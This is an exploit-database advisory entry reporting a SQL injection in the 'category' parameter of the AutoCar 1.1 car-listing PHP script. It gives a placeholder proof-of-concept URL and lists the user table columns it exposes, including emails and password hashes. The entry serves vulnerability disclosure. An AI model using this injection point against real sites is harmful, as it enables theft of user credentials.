AutoCar 1.1 - 'category' SQL Injection

Author: Bora Bozdogan
type: webapps
platform: php
port: 
date_added: 2017-08-28 
date_updated: 2017-08-28 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# #
# Exploit Title: Auto Car - Car listing Script 1.1 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor: http://kamleshyadav.com/
# Software Link: https://codecanyon.net/item/auto-car-car-listing-script/19221368
# Demo: http://kamleshyadav.com/scripts/autocar_preview/
# Version: 1.1
# Tested on: WiN10_X64
# Exploit Author: Bora Bozdogan
# Author WebSite : http://borabozdogan.net.tr
# Author E-mail : borayazilim45@mit.tc
# #
# POC:
#
# http://localhost/[PATH]/search-cars?category=[SQL]
# ts_user
#  user_uname
#  user_fname
#  user_lname
#  user_email
#  user_pwd
# #